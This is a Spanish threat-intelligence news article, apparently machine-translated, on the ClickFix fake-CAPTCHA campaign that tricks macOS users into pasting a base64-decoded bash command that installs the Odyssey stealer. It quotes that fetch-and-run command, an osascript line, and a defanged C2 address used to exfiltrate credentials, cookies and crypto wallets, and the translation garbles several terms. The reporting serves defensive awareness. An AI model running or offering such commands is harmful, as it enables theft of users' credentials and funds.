En los últimos meses, los investigadores de seguridad han observado una nueva campaña de phishing que se dirige a usuarios de MacOS bajo la apariencia de un proceso de verificación de Captcha.
Este ataque, denominado “ClickFix”, aprovecha una combinación de la detección de la ingeniería social y el sistema operativo para convencer a las víctimas para ejecutar comandos maliciosos directamente en sus terminales.
Al imitar las verificaciones legítimas de estilo CloudFlare, el malware evita soltar binarios tradicionales, en su lugar, depender de scripts codificados en Base64 que obtienen una carga útil de AppleScript offushed.
Inicialmente, a los usuarios desprevenidos que navegan a una URL comprometida, a menudo suplantando plataformas comerciales populares, se les presenta una página de verificación humana adaptada a su sistema operativo.
Los visitantes de Windows reciben instrucciones inocuas de PowerShell, mientras que los usuarios de MacOS reciben instrucciones de abrir terminal, pegar un comando copiado y presione la devolución.
Instrucciones de MacOS (fuente – ForcePoint)
Los analistas de ForcePoint identificaron que esta sutil divergencia en las instrucciones está diseñada para engañar a las víctimas de MacOS para que ejecute un comando que decodifique y tuve una cadena base64 en Bash:-
echo “y3vybcatcybodhrwoi8vnduumtq2ljEzmc4xmzevzc92axb4mtqzntagfcbub2h1ccbiyxn0icy =” \ | base64 -d | intento
Una vez que se ejecuta el comando, instala un archivo compilado de AppleScript ofuscado (.SCPT) que lleva a cabo las actividades principales de recolección de datos. El script comienza creando un directorio temporal único en /tmp, utilizando llamadas de Osascript para ensamblar y ejecutar comandos:
Osascript -e ‘ejecutar script “en mkdir (item) \ ntry \ nset filepath a forma citada de (ruta posix de elemento) \ ndo shell script \” mkdir -p \ “& filepath \ nend try \ nend mkdir”‘
Investigadores de Forceint anotado Que, después de la configuración del directorio, el malware escanea las carpetas de escritorio, documentos y bibliotecas del usuario para archivos con extensiones como .pdf, .docx, .key y artefactos específicos del navegador, incluidas bases de datos de llaves, cookies de safari y bases de datos de Apple Notes.
Comienzo de Script & Creación Directorio (Fuente – ForcePoint)
El script procede a enumerar los perfiles en los navegadores de Firefox y Cromium, copiando credenciales guardadas, cookies, historial de formularios y archivos de billetera encriptados para extensiones criptográficas conocidas como Metamask y Exodus.
Mecanismo de infección Dive Deep Dive
El mecanismo de infección depende de la ejecución manual de un comando de “verificación” aparentemente benigna. Al emplear la codificación Base64, los atacantes oscurecen el verdadero propósito de la carga útil, sin pasar por la detección basada en la firma.
Cuando se decodifica, la carga útil obtiene un AppleScript altamente ofuscado de un servidor remoto (hxxp: //45.146.130 (.) 131/d/VIPX14350). Este AppleScript emplea la ofuscación de cadenas aleatorias e invocaciones de Osascript anidadas para obstaculizar el análisis estático.
Tras la ejecución, solicita al usuario que su contraseña aumente los privilegios y luego recopile los detalles del perfil del sistema a través de:-
system_profiler spsoftwaredatype sphardwaredatatype spdisplaysdatatype
Los datos cosechados, junto con los archivos recopilados, se archivan en /tmp/out.zip y se exfiltran al punto final C2 del atacante en 45.146.130.131/log.
Una rutina de limpieza luego elimina el directorio temporal para borrar trazas, lo que complica la recuperación forense.
Página de inicio de sesión de Odyssey Stealer (Fuente – ForcePoint)
Al combinar las indicaciones familiares de la Captcha con la ingeniería social basada en terminal, el Stealware Odyssey de malware ClickFix demuestra una técnica de evasión sofisticada que deja de lado las soluciones antivirus tradicionales, enfatizando la necesidad de una mayor conciencia del usuario y controles de punto de finalización múltiples.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
